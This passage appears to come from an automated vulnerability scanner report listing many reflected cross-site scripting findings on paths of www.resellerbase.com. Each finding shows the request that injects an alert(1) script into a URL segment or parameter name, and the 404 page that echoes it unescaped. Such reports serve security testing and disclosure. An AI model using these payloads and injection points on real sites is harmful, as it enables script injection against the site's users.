Path:   /detail/22/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 94f74<script>alert(1)</script>80b46527f25 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail94f74<script>alert(1)</script>80b46527f25/22/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail94f74<script>alert(1)</script>80b46527f25/22/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.1764. http://www.resellerbase.com/detail/22/themes/kosmos/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2e229<script>alert(1)</script>dadd5df61ae was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/222e229<script>alert(1)</script>dadd5df61ae/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/222e229<script>alert(1)</script>dadd5df61ae/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.1765. http://www.resellerbase.com/detail/22/themes/kosmos/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload bbbb0<script>alert(1)</script>ac4fe44e139 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/themesbbbb0<script>alert(1)</script>ac4fe44e139/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themesbbbb0<script>alert(1)</script>ac4fe44e139/kosmos/ was not found on this server.</p>
...[SNIP]...

2.1766. http://www.resellerbase.com/detail/22/themes/kosmos/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f4903<script>alert(1)</script>8eed7d51208 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/themes/kosmosf4903<script>alert(1)</script>8eed7d51208/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/kosmosf4903<script>alert(1)</script>8eed7d51208/ was not found on this server.</p>
...[SNIP]...

2.1767. http://www.resellerbase.com/detail/22/themes/kosmos/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 1e292<script>alert(1)</script>87762eb3c67 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/themes/kosmos/?1e292<script>alert(1)</script>87762eb3c67=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/kosmos/?1e292<script>alert(1)</script>87762eb3c67=1 was not found on this server.</p>
...[SNIP]...

2.1768. http://www.resellerbase.com/detail/22/themes/kosmos/images/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3d7e4<script>alert(1)</script>7a5adfc1de3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail3d7e4<script>alert(1)</script>7a5adfc1de3/22/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail3d7e4<script>alert(1)</script>7a5adfc1de3/22/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.1769. http://www.resellerbase.com/detail/22/themes/kosmos/images/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 25b94<script>alert(1)</script>668f6093ba0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/2225b94<script>alert(1)</script>668f6093ba0/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/2225b94<script>alert(1)</script>668f6093ba0/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.1770. http://www.resellerbase.com/detail/22/themes/kosmos/images/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b2356<script>alert(1)</script>252c7fac28c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/themesb2356<script>alert(1)</script>252c7fac28c/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themesb2356<script>alert(1)</script>252c7fac28c/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.1771. http://www.resellerbase.com/detail/22/themes/kosmos/images/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 43595<script>alert(1)</script>68b5e95bfe7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/themes/kosmos43595<script>alert(1)</script>68b5e95bfe7/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/kosmos43595<script>alert(1)</script>68b5e95bfe7/images/ was not found on this server.</p>
...[SNIP]...

2.1772. http://www.resellerbase.com/detail/22/themes/kosmos/images/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f1914<script>alert(1)</script>cc84f141254 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/themes/kosmos/imagesf1914<script>alert(1)</script>cc84f141254/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/kosmos/imagesf1914<script>alert(1)</script>cc84f141254/ was not found on this server.</p>
...[SNIP]...

2.1773. http://www.resellerbase.com/detail/22/themes/kosmos/images/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 44019<script>alert(1)</script>c9a50a39329 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/themes/kosmos/images/?44019<script>alert(1)</script>c9a50a39329=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/kosmos/images/?44019<script>alert(1)</script>c9a50a39329=1 was not found on this server.</p>
...[SNIP]...

2.1774. http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 31e76<script>alert(1)</script>d82da2def56 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail31e76<script>alert(1)</script>d82da2def56/22/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail31e76<script>alert(1)</script>d82da2def56/22/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1775. http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 43b68<script>alert(1)</script>479e1135488 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/2243b68<script>alert(1)</script>479e1135488/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/2243b68<script>alert(1)</script>479e1135488/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1776. http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7acf8<script>alert(1)</script>38db77fc81 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/themes7acf8<script>alert(1)</script>38db77fc81/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes7acf8<script>alert(1)</script>38db77fc81/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1777. http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 40795<script>alert(1)</script>f7eea42d9cf was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/themes/kosmos40795<script>alert(1)</script>f7eea42d9cf/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/kosmos40795<script>alert(1)</script>f7eea42d9cf/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1778. http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 28e99<script>alert(1)</script>aa2a1e37351 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/themes/kosmos/images28e99<script>alert(1)</script>aa2a1e37351/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/kosmos/images28e99<script>alert(1)</script>aa2a1e37351/rating/ was not found on this server.</p>
...[SNIP]...

2.1779. http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/ [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 1c119<script>alert(1)</script>d07010ee153 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/themes/kosmos/images/rating1c119<script>alert(1)</script>d07010ee153/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/kosmos/images/rating1c119<script>alert(1)</script>d07010ee153/ was not found on this server.</p>
...[SNIP]...

2.1780. http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d15f3<script>alert(1)</script>3b0146b4577 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/themes/kosmos/images/rating/?d15f3<script>alert(1)</script>3b0146b4577=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/kosmos/images/rating/?d15f3<script>alert(1)</script>3b0146b4577=1 was not found on this server.</p>
...[SNIP]...

2.1781. http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/0.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3bb28<script>alert(1)</script>23d0706cb38 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail3bb28<script>alert(1)</script>23d0706cb38/22/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:32:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail3bb28<script>alert(1)</script>23d0706cb38/22/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1782. http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/0.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 92ebc<script>alert(1)</script>33952bd1623 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/2292ebc<script>alert(1)</script>33952bd1623/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:33:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/2292ebc<script>alert(1)</script>33952bd1623/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

